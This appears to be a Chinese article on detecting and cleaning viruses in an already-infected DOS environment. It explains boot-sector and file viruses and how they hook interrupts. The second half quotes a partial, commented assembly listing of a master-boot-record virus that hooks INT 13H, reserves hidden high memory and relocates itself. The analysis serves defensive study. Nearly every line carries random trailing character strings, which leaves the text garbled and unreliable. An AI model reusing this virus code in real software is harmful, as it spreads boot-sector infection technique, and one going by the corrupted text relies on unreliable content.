近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 }R-eQT
?? V\^rs41$;
?? 一 、 带毒环境下检测清除病毒的意义 /.<%y8v
?? D>M
a3g
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 e^kccz2f
?? Qj: D=j8
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 '7G'R
?? <,p|3p3
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 *O-1zIlp
?? Awl4*J~
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 *KNj5>6=
??
o`S|
?? 二 、带毒环境下检测清除病毒的原理 <>$`vuU
?? )&:4//}a
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 =H6"\`W
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 vaL+@Kq~&
%7=B?c|
,73kh
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " )\!_`ob
病毒体: wY|&qX,
JMP 01AF ;JMP到01AF W^; wr#
DB 00 ;病毒标计 m[ *)sm
DW 00F5 ;此为搬到高位址后,远程跳转指令
jL8[;*^G
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX ~_ss[\N
DB 02 USfpCRj9
DW 0003 ;此为软盘识别标记,硬盘为0007 YT\x'`>Q
DW EC59 ; z}\TS.
DW F000 ;INT 13H的原入口 }~pT
saw
. xc)A`(g
. 1gk{|keh
. K6<@DP+/
. y1R53u`;L
. K{)N:|y%!$
XOR AX,AX ;清除AX 1}+lL)-!
MOV DS,AX; ;让DS=0000 1A\Jh3;Q
CLI ;清I标志积存器
i zJa`K
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 mh`~1aEr
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 Eukj2a
MOV SP,AX ;开机时为0000:7CB6 )RA$E`!b
STI ;设I标志积存器 QX}O{LQR
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A JJ@O5
PUSH AX ;用RETF,把程序转到引导或分区表位置 A41*4!L=
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 OB"Ur-hJ0
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 -JOtvJIQI
MOV AX,[004E] ;取INT 13H的段地址 ,]HH%/h
MOV [7C0C],AX ;存到010C DM"nxTVre
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 gyi<ot;
;读写以便传播发作 1{@f:~ v?
y ,][
MOV AX,[0413] ;取得内存K数,放在AX #xL^S9P
DEC AX ; XnC`JO+7M
DEC AX ;减2k内存 2eErvfC[
MOV [0413],AX ;存回,通常是638K YEfa8'7R
MOV CL,06 ; ?K,xxH
SHL AX,CL ; pvCn+y/U;
MOV ES,AX ;算出减2K后病毒本体的位址 "@: b'm
MOV [7C05],AX ;AX存入0105 xo{3r\u?}
USF&; M3
;病毒常用手法将系统高段内存减少以便驻留 yZ?|u57
;这样可以免于被其他程序覆盖 I4'mU$)U
N8a+X|3]0
MOV AX,000E ;病毒拦INT 13H gP=(2EVE
;ISR起始的偏移量 mFCDwh]
MOV [004C],AX ;
fNb2>1
MOV [004E],ES ;设原为病毒的INT 13H heQ<%NIA"
MOV CX,01BE ;病毒长度为1BE {pJ{UJKv?
MOV SI,7C00 ;从JMP 01AF开始 XBQ]A89G
XOR DI,DI ;DI=0 ,i KEIxA!
CLD ;清方向标志 <aps)vF
REPZ;
gC^4K9g
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 M$&aNt;
CS: ;分区表能载入0000:7C00正常运作 t\LAotTF/
JMP FAR [7C03] ;跳到为搬过后的位址 mqL&b